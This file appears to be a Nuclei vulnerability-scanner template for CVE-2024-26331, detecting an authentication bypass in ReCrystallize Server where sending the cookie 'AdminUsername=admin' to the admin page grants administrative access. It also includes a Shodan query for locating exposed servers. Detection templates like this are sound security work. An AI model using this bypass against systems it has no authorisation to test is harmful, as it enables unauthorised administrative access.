nuclei-templates/http/cves/2024/CVE-2024-26331.yaml

43 lines
1.6 KiB
YAML

id: CVE-2024-26331
info:
name: ReCrystallize Server - Authentication Bypass
author: Carson Chan
severity: high
description: |
This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
reference:
- https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
- https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
- https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm
- https://github.com/Ostorlab/KEV
classification:
epss-score: 0.00053
epss-percentile: 0.21091
metadata:
verified: true
max-request: 1
shodan-query: title:"ReCrystallize"
tags: cve,recrystallize,auth-bypass,cve2024
http:
- method: GET
path:
- "{{BaseURL}}/Admin/Admin.aspx"
headers:
Cookie: "AdminUsername=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ReCrystallize Server Administration"
- "License Status:"
- "System Info</a>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100ddc2fba9fc4b4c139630136f53ceb821c4a827a26c4cb8c3d0e265aa4623a89c022100cdf4351140e2e01daa44e99fd95c6da5b9a9769e50ef01bc57de9712f58434a2:922c64590222798bb761d5b6d8e72950